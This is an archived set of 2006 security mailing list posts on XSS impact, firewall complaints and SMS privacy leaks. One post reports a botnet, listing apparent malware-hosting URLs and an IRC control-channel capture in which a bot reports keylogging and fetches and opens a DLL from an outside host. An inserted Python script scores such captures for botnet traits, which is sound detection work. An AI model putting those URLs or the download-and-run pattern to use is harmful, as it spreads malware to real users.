On 2/6/06, Research Infratech [EMAIL PROTECTED] wrote:
SNIP

 [Vendor] notified now

SNIP

You have to admire that honesty ;-)

-sb


[Full-disclosure] Text messaging information disclosure query

2006-02-03 Thread Stan Bubrouski
Hello,

For years my cell phone has been the recipient of some pretty scary
text messages which have included complete strangers' prescriptions,
SS#, credit card #s, etc...

Space limitations and a lack of interest in fraud have caused me to
erase these messages in the past, but due to battery consumption
caused by getting dozens of these at once and filling my box as of
late I thought it's time to speak up.

The reason I get this information is extremely poor programming by 3rd
party mobile phone service providers which I had never signed up for.
I know the reason I have been receiving such messages (along with
hundreds of other personal messages not meant for me to see), but now
I'm getting more annoyed and curious.

I'm wondering if others on the list could offer up some of their
experiences with this kind of thing as I'm currently doing a small
writeup on how these companies are erasing our privacy.

What I am looking for is specifics, like such and such company was
spamming my phone with people's credit card orders etc... and provide
a couple examples for verification (off list please, and don't send me
SS# or CC# I have no interest in them).

Best Regards,
Stan Bubrouski


Re: [Full-disclosure] Possible large botnet

2006-01-20 Thread Stan Bubrouski
Is it just me who thinks linking to a log of thousands of e-mail
addresses is in very poor taste on a mirrored list?  If they weren't
harvested before they will be now.

-sb

On 1/20/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 I don't necessarily think whomever was infected was infected via
 viewing this site:

 http://php.tjit.or.kr/ppp/log/sent.txt

 Lists a slew of email addresses which whomever could have sent
 bogus messages to possibly infect (l)users.

 On Fri, 20 Jan 2006 01:35:45 -0500 Pablo Esterban
 [EMAIL PROTECTED] wrote:
 Seems to be a botnet forming with the help of exploiting the
 recent wmf flaw
 on the following site. AFAIK malware/adware is referencing this.
 
 
 D O  N O T  C L I C K
 http://213.17.233.194/mediabar.wmf
 http://213.17.233.194/stat_s3.php
 http://213.17.233.194/stat.html
 D O  N O T  C L I C K
 
 This injects a trojan connecting to 219.240.142.59 on port 44234
 
 44234/tcp open irc  Unreal ircd
 47292/tcp open irc  Unreal ircd
 47296/tcp open irc  Unreal ircd
 54729/tcp open irc-proxypsyBNC 2.3.1
 
 Channel stats list around 500 bots and around 1200 connected (may
 or may not
 be accurate), however if you poke around you will find
 http://219.240.142.59/usage/, containing some interesting links
 and info
 about when this most likely started.
 
 The tcp stream below demos the login, and calling of
 http://219.240.142.59/ppp/mediax.dll. Stats for January list close to 90k
 hits on this particular file(!).
 
 
 NICK *
 
 USER plnaehe 0 0 :*
 
 :irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
 
 :irc.foonet.com NOTICE AUTH :*** Found your hostname
 
 :irc.foonet.com 001 *:Welcome to the ROXnet IRC Network *
 
 :irc.foonet.com 002 *:Your host is irc.foonet.com, running
 version
 Unreal3.2.3
 
 :irc.foonet.com 003 *:This server was created Thu Oct 13 2005
 at
 17:25:57 KST
 
 :irc.foonet.com 005 *SAFELIST HCN MAXCHANNELS=10
 CHANLIMIT=#:10
 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307
 KICKLEN=307
 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS WATCH=128 :are supported by
 this server
 
 :irc.foonet.com 005 *SILENCE=15 MODES=12 CHANTYPES=#
 PREFIX=(ohv)@%+
 CHANMODES=beIqa,kfL,lj,psmntirRcOAQKVGCuzNSMTG NETWORK=ROXnet
 CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT [EMAIL PROTECTED] EXCEPTS
 INVEX
 CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
 
 :irc.foonet.com 251 *:There are 1 users and 1194 invisible on
 1 servers
 
 :irc.foonet.com 252 *1 :operator(s) online
 
 :irc.foonet.com 253 *201 :unknown connection(s)
 
 :irc.foonet.com 254 *10 :channels formed
 
 :irc.foonet.com 255 *:I have 1195 clients and 0 servers
 
 :irc.foonet.com 265 *:Current Local Users: 1195  Max: 5529
 
 :irc.foonet.com 266 *:Current Global Users: 1195  Max: 1276
 
 :irc.foonet.com 422 *:MOTD File is missing
 
 *MODE *:+iwTxd
 
 USERHOST *
 
 :irc.foonet.com 302 *:*
 
 MODE *-x+B
 
 JOIN #mrbean5 rowan
 
 PRIVMSG *:[KEYLOG]: Key logger active.
 
 USERHOST *
 
 MODE *-x+B
 
 JOIN #mrbean5 rowan
 
 USERHOST *
 
 MODE *-x+B
 
 JOIN #mrbean5 rowan
 
 :irc.foonet.com NOTICE *:BOTMOTD File not found
 
 *MODE *:-x+B
 
 * JOIN :#mrbean5
 
 :irc.foonet.com 332 *#mrbean5 :.wipe
 http://219.240.142.59/ppp/mediax.dll mediax.dll 3
 
 :irc.foonet.com 333 *#mrbean5 DDDI 1137401387
 
 :irc.foonet.com 353 *@ #mrbean5 *
 
 :irc.foonet.com 366 *#mrbean5 :End of /NAMES list.
 
 *PRIVMSG *:[KEYLOG]: Key logger active.
 
 :irc.foonet.com 302 *
 
 :irc.foonet.com 302 *
 
 PRIVMSG #mrbean5 :[DOWNLOAD]: Downloading URL:
 http://219.240.142.59/ppp/mediax.dll to: mediax.dll.
 
 :irc.foonet.com 404 *#mrbean5 :You need voice (+v) (#mrbean5)
 
 PRIVMSG #mrbean5 :[DOWNLOAD]: Downloaded 214.5 KB to
 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll @ 71.5 KB/sec.
 
 PRIVMSG #mrbean5 :[DOWNLOAD]: Opened:
 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll.
 
 :irc.foonet.com 404 *#mrbean5 :You need voice (+v) (#mrbean5)
 
 :irc.foonet.com 404 *#mrbean5 :You need voice (+v) (#mrbean5)
 
 -BEGIN PGP SIGNATURE-
 Note: This signature can be verified at https://www.hushtools.com/verify
 Version: Hush 2.4

 wkYEARECAAYFAkPQ7FsACgkQo8cxM8/cskpeWgCfYV8lOqt4qAqGHbXl3/YPjsjE26oA
 oIe+zN0P1qsDz+gfy4da+vfZ+A3y
 =suSR
 -END PGP SIGNATURE-
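
As an added example (not part of any message in this thread), the Python sketch below parses an IRC capture shaped like the session quoted above and scores the bot-like traits it shows: bracketed status reports, a channel topic carrying a download URL, the UnrealIRCd +B bot user mode, and a lopsided invisible-user count. The capture, nick, host, channel, the 192.0.2.10 address, the weights and the threshold are constructed assumptions.

```python
import re
from dataclasses import dataclass, field

# Constructed capture modelled on the quoted session; nick, host, channel,
# key and the 192.0.2.10 address (documentation range) are all made up.
SAMPLE_CAPTURE = """\
NICK xkqzt
USER user1 0 0 :xkqzt
:irc.example.net 001 xkqzt :Welcome to the IRC Network xkqzt
:irc.example.net 251 xkqzt :There are 1 users and 1194 invisible on 1 servers
:irc.example.net 422 xkqzt :MOTD File is missing
MODE xkqzt -x+B
JOIN #chan5 secretkey
:irc.example.net 332 xkqzt #chan5 :.wipe http://192.0.2.10/ppp/sample.dll sample.dll 3
:irc.example.net 366 xkqzt #chan5 :End of /NAMES list.
PRIVMSG #chan5 :[KEYLOG]: Key logger active.
PRIVMSG #chan5 :[DOWNLOAD]: Downloading URL: http://192.0.2.10/ppp/sample.dll to: sample.dll.
:irc.example.net 404 xkqzt #chan5 :You need voice (+v) (#chan5)
PRIVMSG #chan5 :[DOWNLOAD]: Opened: sample.dll.
"""

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
TAG_RE = re.compile(r"^\[([A-Z][A-Z0-9 _-]{1,20})\]:")   # e.g. "[KEYLOG]:"
USERS_RE = re.compile(r"(\d+) users and (\d+) invisible")
RISKY_EXT = (".exe", ".dll", ".scr", ".pif", ".bat", ".cmd")
THRESHOLD = 5  # assumed cut-off; tune against your own traffic


@dataclass
class Report:
    channels: set = field(default_factory=set)
    urls: set = field(default_factory=set)
    findings: list = field(default_factory=list)  # (weight, description)

    @property
    def score(self):
        return sum(weight for weight, _ in self.findings)

    @property
    def is_suspicious(self):
        return self.score >= THRESHOLD


def parse_irc_line(line):
    """Split one RFC 1459 line into (prefix, command, params)."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    if not parts:
        return None
    params = parts[1:]
    if sep:
        params.append(trailing)
    return prefix, parts[0].upper(), params


def added_modes(modestring):
    """Return the set of mode letters that a string like '-x+B' turns on."""
    adding, added = True, set()
    for ch in modestring:
        if ch in "+-":
            adding = ch == "+"
        elif adding:
            added.add(ch)
    return added


def analyze(capture):
    """Score one client's IRC session for command-and-control traits."""
    report = Report()
    for raw in capture.splitlines():
        parsed = parse_irc_line(raw)
        if parsed is None:
            continue
        prefix, command, params = parsed
        from_client = prefix is None          # client lines carry no prefix
        text = params[-1] if params else ""
        urls = [u.rstrip(".,)") for u in URL_RE.findall(text)]
        report.urls.update(urls)

        if command == "JOIN" and from_client and params:
            report.channels.add(params[0])
            if len(params) > 1:
                report.findings.append((1, "join supplies a channel key"))
        elif command == "MODE" and from_client and len(params) >= 2:
            if "B" in added_modes(params[1]):
                report.findings.append((1, "client marks itself as a bot (+B)"))
        elif command == "332" and len(params) >= 3:
            # RPL_TOPIC: a topic that points at a binary acts as a standing order.
            if any(u.lower().endswith(RISKY_EXT) for u in urls):
                report.findings.append((3, "topic carries a binary download URL"))
        elif command == "PRIVMSG" and from_client and len(params) >= 2:
            tag = TAG_RE.match(params[1])
            if tag:
                report.findings.append((2, "status report tagged " + tag.group(1)))
        elif command == "251":
            counts = USERS_RE.search(text)
            if counts:
                visible, invisible = map(int, counts.groups())
                if invisible > 100 and invisible > 10 * max(visible, 1):
                    report.findings.append((1, "almost all users are invisible"))
    return report


if __name__ == "__main__":
    result = analyze(SAMPLE_CAPTURE)
    print(result.score, result.is_suspicious, sorted(result.urls))
    for weight, description in result.findings:
        print(weight, description)
```
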





Re: [Full-disclosure] MBT Xss vulnerability

2006-01-20 Thread Stan Bubrouski
Well I'm not going to talk about how XSS is useless because we all
know it can be quite a serious problem.  I think, and I don't know the
guy so I can't be sure, the original dissenter to this post was
pointing out that:
What would you phish from a site that doesn't have any forms anyways?
What would stealing a session cookie get you if the only dynamic
content is a search function?

I'm not saying XSS isn't important, I'm just wondering why this case is?

-sb

On 1/20/06, Jerome Athias [EMAIL PROTECTED] wrote:
 Hey guy, do you know something about XSS
 1) Phishing?
 2) encoded URL, UTF8...?
 3) cookie steal?
 ...

 it'll not be difficult to reproduce a website and have an url difficult
 to understand for a basic user...
 sure it's harder to spoof the url in the browser...
 //

 Native.Code wrote:
  What a lame vulnerability it is. If your POC redirects to another site
  (which is not MBT site), how someone will become victim and believe that
  he/she is doing business with MBT?
 
  Your post is yet another proof that FD is more and more inhibited by script
  kiddies. Get a life!
 


 -
 About FD:
 Speech is silver, but silence is gold


 /JA
 /https://www.securinfos.info/


Re: [Full-disclosure] Re: Re: PC Firewall Choices

2006-01-20 Thread Stan Bubrouski
Nancy,

I was not trying to make the point that ZA is some buggy unusable
crap.  Just that even properly configured we have encountered
instances where it misbehaves, behaves inconsistently, and slows down
web browsing with IE (not so much with opera or firefox apparently as
I tried that out last night under a few setups).

That said, configuring it correctly is key to its operation, if you
misclicked at some point and accidentally set a rule not to allow
certain traffic or a certain application access to the network then
you may experience the problems you describe.  Please make sure you
review all the rules and specific application settings to make sure
your problems aren't configuration-related.

-sb

On 1/20/06, Nancy Kramer [EMAIL PROTECTED] wrote:
 I have the paid ZA but I heard the free one was better.  Have no idea about
 that but would never buy the paid version again.  At least now I know what
 was happening.  Will try to look for that feature and set it to the maximum
 minutes.  I only have it on my laptop which only goes on the internet
 sporadically but generally goes on the internet on public wireless networks
 which I think may not be all that secure.  Lots of times I am meeting with
 someone there and we talk and then lookup something on the internet.  I
 could see how time could pass quickly and I might not touch the computer
 for awhile.  Thanks for the explanation.

 Regards,

 Nancy Kramer


At 10:10 PM 1/19/2006, Greg wrote:



   -Original Message-
   From: [EMAIL PROTECTED]
   [mailto:[EMAIL PROTECTED] On Behalf
   Of Nancy Kramer
   Sent: Friday, 20 January 2006 2:30 PM
   To: Stan Bubrouski; full-disclosure@lists.grok.org.uk
   Subject: Re: [Full-disclosure] Re: Re: PC Firewall Choices
  
  
   I admit I know nothing about firewalls but with ZA I have had
   to shut it
   down sometimes to go onto the internet.  I have no idea why.
   I just can't
   get on and when I shut it down I can.
  
 
 That'd be a well known and never fixed bug I reported to Zonelabs some years
 back now. It has a feature to automatically lock internet connection after
 so many minutes of inactivity. The length of time can be changed by the
 user. What it REALLY did was cut off access to internet and any LAN you were
 on, isolating you entirely and never actually let go of it when the user was
 back at the keyboard. Exiting ZA let that go and internet and lan were
 restored. You have the option to turn that feature OFF but even that didn't
 stop the whole thing happening. So, about the only thing you could do was to
 set the auto lock as high as it could go and turn the feature off. It would
 still go off after that many minutes had passed (which I believe is 999 in
 the PRO version and 99 in the free version) and lock you out again but it
 was delayed by that much, at least.
 
 You CAN set certain programs to pass by its lock, however. So, if you have
 some computers almost always chattering away on a distributed project but
 otherwise not touched, you could allow those programs to pass on even
 though, should you attempt to get out with a simple web browser (where it
 wasn't allowed to pass the lock), you can't. Saves some stuffing about on
 such machines and let's face it - the more free some company execs see,
 the more likely they are to use it. Surprising how many Windows based
 companies use free ZA.
 


Re: [Full-disclosure] MBT Xss vulnerability

2006-01-20 Thread Stan Bubrouski
Reading over this again let me clarify why I'm curious about this:
1) Yes I'm aware someone could redirect someone to a form claiming to
be by MBT to harvest information
2) I just don't see the relevance to this list (if we reported every
XSS in every site, we could fill this list with 100s of messages per
day)

Know what I mean?

-sb

On 1/20/06, Stan Bubrouski [EMAIL PROTECTED] wrote:
 Well I'm not going to talk about how XSS is useless because we all
 know it can be quite a serious problem.  I think, and I don't know the
 guy so I can't be sure, the original dissenter to this post was
 pointing out that:
 What would you phish from a site that doesn't have any forms anyways?
 What would stealing a session cookie get you if the only dynamic
 content is a search function?

 I'm not saying XSS isn't important, I'm just wondering why this case is?

 -sb

 On 1/20/06, Jerome Athias [EMAIL PROTECTED] wrote:
  Hey guy, do you know something about XSS
  1) Phishing?
  2) encoded URL, UTF8...?
  3) cookie steal?
  ...
 
  it'll not be difficult to reproduce a website and have an url difficult
  to understand for a basic user...
  sure it's harder to spoof the url in the browser...
  //
 
  Native.Code wrote:
   What a lame vulnerability it is. If your POC redirects to another site
   (which is not MBT site), how someone will become victim and believe that
   he/she is doing business with MBT?
  
   Your post is yet another proof that FD is more and more inhibited by script
   kiddies. Get a life!
  
 
 
  -
  About FD:
  Speech is silver, but silence is gold
 
 
  /JA
  /https://www.securinfos.info/


Re: [Full-disclosure] MBT Xss vulnerability

2006-01-20 Thread Stan Bubrouski
On 1/20/06, MuNNa [EMAIL PROTECTED] wrote:
 Hii

 -Why would he be concerned?  The problem is that most sites on the
 internet suffer from XSS vulnerabilities, it's just that nobody cares
 because there is nothing to gain from the sites.  Nothing to gain you
 say?  Yes.  Let's take this site you posted about for example, I
 didn't look over the entire site, but glancing I don't even see
 anything which XSS would help you compromise.  The site seemingly is
 all static content (minus a search, correct me if I'm wrong) with no
 e-mail portal, forums, or anything else that the XSS could be
 leveraged to gain access to.  Since the site offers no direct
 services (right?) what exactly could you trick people into doing here?
 The session cookie seems worthless since there's no login or
 anything...

 I have clearly mentioned in the disclosure that this Xss is not harmful for
 server side but you can target a lot of people, using this website. If you
 have completely read my disclosure mail, I have mentioned in the end that a
 lot of people seeking job can be targeted. I can say this because I know the
 value of this organisation from point of placements. Moreover this
 organisation provides security solution to other companies. From the point
 of company's security everything is fine but from the point of its social
 image..

Okay.



 -Which would be meaningful if:
 A) this site were used by millions of people
 B) there was something worth compromising the site for (like access to
 webmail, personal information, etc...)
 I think what I'm missing here is why this particular XSS is useful in
 any way shape or form? Am I missing something significant about
 this site?  Do people trust it for something?

 As explained before , it can attract a lot of job-seekers. Millions of them.
 They trust this organisation. Even i do very much.


Okay see that's why I asked since this site is used by millions of
people that actually answers my question.  Thank you.

 -Isn't that what you are doing?

 I just posted a disclosure which I felt could be used by some bad guy to
 target innocent people. If anyone felt that this disclosure is some sort of
 spam and is really harmless, just discard it. At least I don't spam here by
 bashing someone else who has posted some disclosure. This bashing attitude
 reflects Lamer qualities and this discourages others from mailing
 disclosures.


Yeah I actually felt bad after I wrote that line, I just didn't
understand how his response contributed to spam and yours didn't, know
what I mean?

 Hope I answered all your answers. Let's cut down the argument here.


You did, and thoroughly! I thank you!

 Regards;

 Santosh J


You da man,
Stan

 On 1/20/06, Stan Bubrouski [EMAIL PROTECTED] wrote:
  On 1/19/06, MuNNa [EMAIL PROTECTED] wrote:
  
   Hahaha ... native code doesn't seem to understand the meaning of Xss and
 why
   it can be of security concern. Here not only url re-direction is
 possible
 
  Why would he be concerned?  The problem is that most sites on the
  internet suffer from XSS vulnerabilities, it's just that nobody cares
  because there is nothing to gain from the sites.  Nothing to gain you
  say?  Yes.  Let's take this site you posted about for example, I
  didn't look over the entire site, but glancing I don't even see
  anything which XSS would help you compromise.  The site seemingly is
  all static content (minus a search, correct me if I'm wrong) with no
  e-mail portal, forums, or anything else that the XSS could be
  leveraged to gain access to.  Since the site offers no direct
  services (right?) what exactly could you trick people into doing here?
  The session cookie seems worthless since there's no login or
  anything...
 
   but also execution of malicious javascripts is possible. Your Lame reply
 
  Which would be meaningful if:
  A) this site were used by millions of people
  B) there was something worth compromising the site for (like access to
  webmail, personal information, etc...)
 
  I think what I'm missing here is why this particular XSS is useful in
  any way shape or form? Am I missing something significant about
  this site?  Do people trust it for something?
 
   makes me think that you are one of the following:
   1.An employee of MBT criticising me in the interest of the company
 'or'
   2.A poor spammer who doesn't know anything but tries to show off as if
 he is
   the MASTER. If this is the case carry on with your spamming business and
   good luck for your future.
 
  Isn't that what you are doing?
 
  -sb
 
  
   Regards;
   Santosh J.
  
  
 




Re: [Full-disclosure] MBT Xss vulnerability

2006-01-20 Thread Stan Bubrouski
On 1/20/06, Morning Wood [EMAIL PROTECTED] wrote:

 in all honesty, XSS is a serious vector of attack.
 however, non-persistent XSS is a much less serious problem
 than is persistent XSS. Generally XSS is of no harm to the server
 side anyway. It can however be leveraged as the OP said, but
 would require  a dedicated, pre-formed url string that needs to
 be presented to the user to be effective. IMHO the OP advisory
 should not have been posted, because of the non-persistent nature
 of the flaw at one dedicated site.

Unless that site is trusted by hundreds of thousands or millions of
people, then something minor can be made to be much more serious.  For
instance, in this case someone could create a form for phishing
purposes that looks like a job application and mail it to millions of
people who think that its from MBT.


  Issues come into play via persistent XSS, which is script that may
 be embedded in a web application, such as a guestbook, or comment
 section, where people would travel to on their own without the need of
 a direct link and then rendered upon visitation in the users browser.
 Further, in today's world of browser exploitation, cookie, session,
 and/or credential theft is not the only thing to be gained and is often
 of minor importance and information. What is bad is leveraging XSS
 as a vector for browser exploitation ( can we say IFRAME+WMF ),
 so you have a way, via XSS to COMPROMISE end users systems.

 While the OP does have a valid initial point and theory,
 1. it is not persistent in nature
 2. it is one site, and not a script used on many sites

Yes that's what I was thinking, but apparently a lot of people use it,
at least that's the gist I got.

 3. it does require SE at some level to be effective
 4. it should not have been posted to FD ( see points 1,2,3 )

This was my concern in previous replies.  Why should XSS on one site
be posted here, but as the list maintainer stated previously XSS in
big sites like Google or Yahoo is pertinent to this list due to the
large number of people they can affect.  Assuming the author is
correct about it possibly affecting millions of people then its
relevance to this list is clearly satisfied.

-sb



 my2bits,
 MW


Re: [Full-disclosure] Re: PC Firewall Choices

2006-01-19 Thread Stan Bubrouski
On 1/19/06, Dave Korn [EMAIL PROTECTED] wrote:
  I'd like to second what Greg says.

  I've used ZA for years, through many changes of version.

  It's never forgotten its settings for me.
  It's never blocked anything it shouldn't or not blocked anything it
 should.

Really?  Do you just run notepad?  I've had to remove it on several
machines because it blocked the launch of certain applications despite
there being no rules to do so.  This includes (to my recollection this
was some months ago) some popular tax software updating features,
adobe acrobat plugin stopped working within IE even though it was
configured to, and numerous other problems that couldn't be tracked to
any rules.

  It's not remotely bloated compared to similar packages like anything
 Norton/Symantec/McAfee[*]

Symantec is hugely bloated, but on a 1.2 GHz machine I have here, when
ZA is installed web browsing with IE is slowed down very noticeably,
far more than average Norton System Works install causes.

  Nor do I find a dialog such as Should internet explorer be allowed to
 connect to the internet at all confusing.


Neither does anyone else in this thread, you just presume we're all
lusers who can't read English or configure simple software.

  So I'm convinced the problem exists between chair and keyboard.


Your wild assumptions that because you've never had a problem that
anyone who does must be an idiot is astounding...do you teach?  Try
using google you'll find thousands of ZA problems, not all imagined.

  Can you actually back up your claims?  For example, can you describe a
 simple procedure, that anyone with ZA installed could try out, that shows it
 to misbehave?  Or do you have detailed notes that you took at the time one
 of these problems occurred that shows the symptoms you observed and the
 steps you took to attempt to diagnose and solve the problem?


Having uninstalled it, deleted the executable, and wiped my free space.  No.

  Or can we just expect to hear No, I didn't know what was going on, I
 didn't keep proper notes, I was in a rush and just needed to get things
 working so I didn't investigate?  In which case it would be false to claim

It's clearly the problem if it degrades system performance, some apps
fail to load, and all this goes away when is disabled.  And who the
hell takes notes on every piece of software they install and remove
because it's buggy?  Please we'd all have a set of encyclopedia-sized
notes for Windows problems alone.

 that you knew ZA to be the cause of the problem, rather than either pilot
 error or a faulty PC or any number of other confounding factors that could
 arise?


It's easy to know, because when you uninstall it suddenly things are
much smoother and your heart rates go back down.

  I hear people slagging off ZA quite often, but not one of them has ever
 been able to actually demonstrate a real problem or even explain what the
 problem is in terms any more precise than Uh I dunno it just went wrong.


Just because someone doesn't take notes every time some piece of shit
software doesn't work as advertised and uninstall it, doesn't make
what they say any less true.  Why would I install something just to
prove it causes problems to satisfy the ego of someone who thinks
because something works for them it must be perfect for everyone.  It
would be fruitless.  If you can't find anyone reporting real problems
with ZA then maybe you should browse your way over to www.google.com
and do a search.

cheers,
  DaveK

 [*] which I consider to be the gold standard for lousy, bloated, buggy,
 faulty software.
 --
 Can't think of a witty .sigline today

I have a sigline for you:  ZA is in my mouth.
Stop sucking.


Why isn't it friday yet,
-sb






Re: [Full-disclosure] Re: PC Firewall Choices

2006-01-19 Thread Stan Bubrouski
As cruel as that last message was I'm sick of the ZA pros here saying
it's perfect, it's not, far from it.  But I forgot to mention it beats
Symantec's firewall hands down.

Symantec Personal Firewall I've found from many different versions the
same horrible inconsistencies in my experience installing it for a
family member.  For example:

1) In the 2004 iteration of NPF it would simply stop working at times.
 Basically it would just completely stop working and would prevent the
launch of even trusted applications.  The only solution was to reset
and pray it didn't happen again soon.
2) Even though Opera was fully configured in the rules (tried manually
and automatic scan option), it would only launch half the time.  NPF
would block it from launching despite its own rules.  It did this
selectively with different applications.  Sometimes it was just Opera,
other times IE or Firefox would not open either.  Killing the firewall
service would make this go away.

The above alone was enough to drive you nuts.  NPF acted the above way
after several reinstalls and even the formatting of the drive and
reinstallation of Windows had no effect on its buggy ways.  2005
edition was no better.  The 1st problem mentioned above didn't seem to
happen with 2005, but the second problem continued unabated.  It's
like NPF would just decide on its own it didn't like a particular app
or rule.  It is relatively easy to configure, though finding exactly
what you're looking for in the settings can be a pain at times.

Best Regards,
sb

On 1/19/06, Stan Bubrouski [EMAIL PROTECTED] wrote:
 On 1/19/06, Dave Korn [EMAIL PROTECTED] wrote:
   I'd like to second what Greg says.
 
   I've used ZA for years, through many changes of version.
 
   It's never forgotten its settings for me.
   It's never blocked anything it shouldn't or not blocked anything it
  should.

 Really?  Do you just run notepad?  I've had to remove it on several
 machines because it blocked the launch of certain applications despite
 there being no rules to do so.  This includes (to my recollection this
 was some months ago) some popular tax software updating features,
 adobe acrobat plugin stopped working within IE even though it was
 configured to, and numerous other problems that couldn't be tracked to
 any rules.

   It's not remotely bloated compared to similar packages like anything
  Norton/Symantec/McAfee[*]

 Symantec is hugely bloated, but on a 1.2 GHz machine I have here, when
 ZA is installed web browsing with IE is slowed down very noticeably,
 far more than average Norton System Works install causes.

   Nor do I find a dialog such as Should internet explorer be allowed to
  connect to the internet at all confusing.
 

 Neither does anyone else in this thread, you just presume we're all
 lusers who can't read English or configure simple software.

   So I'm convinced the problem exists between chair and keyboard.
 

 Your wild assumptions that because you've never had a problem that
 anyone who does must be an idiot is astounding...do you teach?  Try
 using google you'll find thousands of ZA problems, not all imagined.

   Can you actually back up your claims?  For example, can you describe a
  simple procedure, that anyone with ZA installed could try out, that shows it
  to misbehave?  Or do you have detailed notes that you took at the time one
  of these problems occurred that shows the symptoms you observed and the
  steps you took to attempt to diagnose and solve the problem?
 

 Having uninstalled it, deleted the executable, and wiped my free space.  No.

   Or can we just expect to hear No, I didn't know what was going on, I
  didn't keep proper notes, I was in a rush and just needed to get things
  working so I didn't investigate?  In which case it would be false to claim

 It's clearly the problem if it degrades system performance, some apps
 fail to load, and all this goes away when is disabled.  And who the
 hell takes notes on every piece of software they install and remove
 because it's buggy?  Please we'd all have a set of encyclopedia-sized
 notes for Windows problems alone.

  that you knew ZA to be the cause of the problem, rather than either pilot
  error or a faulty PC or any number of other confounding factors that could
  arise?
 

 It's easy to know, because when you uninstall it suddenly things are
 much smoother and your heart rates go back down.

   I hear people slagging off ZA quite often, but not one of them has ever
  been able to actually demonstrate a real problem or even explain what the
  problem is in terms any more precise than Uh I dunno it just went wrong.
 

 Just because someone doesn't take notes every time some piece of shit
 software doesn't work as advertised and uninstall it, doesn't make
 what they say any less true.  Why would I install something just to
 prove it causes problems to satisfy the ego of someone who thinks
 because something works for them it must be perfect for everyone.  It
 would be fruitless

Re: [Full-disclosure] Security Bug in MSVC

2006-01-19 Thread Stan Bubrouski
On 1/19/06, redsand [EMAIL PROTECTED] wrote:


 i think the author of this advisory is desperate for advisories or
 attention.

Well maybe the guy was just misled because Microsoft led him to
believe it was something exciting?  Either way it seems like anyone
could open a project file in notepad and insert/modify anything they
want in there.  I mean it's not like we've ever been able to trust
projects or Makefiles/configures anyways.


 either way he needs to open a disassembler and work on something else.


-sb

 Pavel Kankovsky wrote:

 On Tue, 17 Jan 2006, Morning Wood wrote:
 
 
 
 extract, and open hello.dsw
 click batch build, build or rebuild all
 code will execute ( calc.exe and notepad.exe used as an example )
 
 
 
 What's the point of building a bunch of sources unless
 1. you trust their author, or
 2. you have made sure there is nothing malicious there?
 
 When you build an executable from untrusted sources, you get an untrusted
 executable. Either you run it and you're screwed anyway, or you don't run
 it and you wasted your time building it.
 
 (Indeed, there are some marginal cases like when you want to build an
 executable file intended to run on someone else's computer...)
 
 --Pavel Kankovsky aka Peak  [ Boycott Microsoft--http://www.vcnet.com/bms ]
 Resistance is futile. Open your source code and prepare for assimilation.
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
 
 



Re: [Full-disclosure] PC Firewall Choices

2006-01-19 Thread Stan Bubrouski
My personal favorite was the older versions of Tiny Personal Firewall,
though they did have the major flaw of popping up stuff when the
computer was locked thus I stopped using it.  They fixed it, but the
revamped interface they put out a couple years ago wasn't to my
liking.  What do you think of the current Tiny compared to ZA?

-sb

On 1/17/06, Steven [EMAIL PROTECTED] wrote:
 I am looking at supplementing the Windows XP (Pro) SP2 Firewall with a third
 party product on a bunch of Windows machines.  I am trying to determine what
 product to go with and wanted to solicit some opinions from this mailing
 list.  The four that I really come across and have used in some cases are
 ZoneAlarm, Sygate, Norton, Kerio, and Tiny.  My understanding is that Norton
 has actually acquired Sygate and that the Sygate Personal Firewall probably
 wouldn't be the best choice of these now.  With that in mind I am looking
 for a product that is easy to set up, easy to use, works well, and does not take
 up too much in terms of system resources or harddrive space ( I also don't
 want it to add 20 minutes to the boot process either).

 I am not looking for e-mail protection, antivirus, or any other non-firewall
 type services to be included.  I do however want it to be able to manage
 applications and their internet usage.  (i.e. if they install something new
 that tries to access the web (trojans included) they will get a popup
 telling them something is doing this).

 Any suggestions and opinions on the above products and any others that I
 might not have mentioned are welcomed.

 Also -- on top of this if someone knows of software/hardware that can scan
 these machines and verify whether or not both the SP2 FW and/or the 3rd party
 FW -- and perhaps prevent them network access if they are not running --
 please let me know. [I am not sure what security products have these
 capabilities]

 Thanks

 Steven




Re: [Full-disclosure] Re: Re: PC Firewall Choices

2006-01-19 Thread Stan Bubrouski
On 1/19/06, Greg [EMAIL PROTECTED] wrote:

 I don't think anymore needs be said. Your mistakes, above, are enough to
 condemn you by your own word so for the sake of not making this any worse,
 we'll leave it here.


What a convenient cop-out.

-sb



Re: [Full-disclosure] Security Bug in MSVC

2006-01-17 Thread Stan Bubrouski
On 1/17/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 I think ms won't fix any bug in vstudio, I have told them if they will
 fix the vs2005 issue published recently and they told me exactly what
 is on your support page:

 Only open project files that come from trusted sources.


Yeah but hasn't it always been the case that you can execute pretty
much anything from a msvs project file anyways?


 or Only open WMF files that come from trusted sources. would have
 been less effort than releasing a patch then lol :D


-sb


Re: [Full-disclosure] Steve Gibson smokes crack?

2006-01-14 Thread Stan Bubrouski
Yes he did. :)

-sb

On 1/13/06, Todd Towles [EMAIL PROTECTED] wrote:
 Stan wrote:
  Yeah cause threads like this really open people's eyes...

 I do agree with that...and I think the people know what they are seeing.
 Bkfsec stated the situation very well IMHO.

 cum hoc ergo propter hoc

 -Todd



Re: [Full-disclosure] Steve Gibson smokes crack?

2006-01-13 Thread Stan Bubrouski
Ordinarily I'd argue, but it's hard to when we find out Microsoft knew
about the bug for a long time and made a conscious decision not to
patch it even though they knew it could lead to a system compromise.

People commented on how Microsoft put out a patch quicker than they
usually would but this is NOT THE CASE.  According to Microsoft
itself, they knew about the bug months before it was reported in
December.  Don't give credit where it's not earned...

-sb

On 1/13/06, Morning Wood [EMAIL PROTECTED] wrote:
 http://aolradio.podcast.aol.com/sn/SN-022.mp3

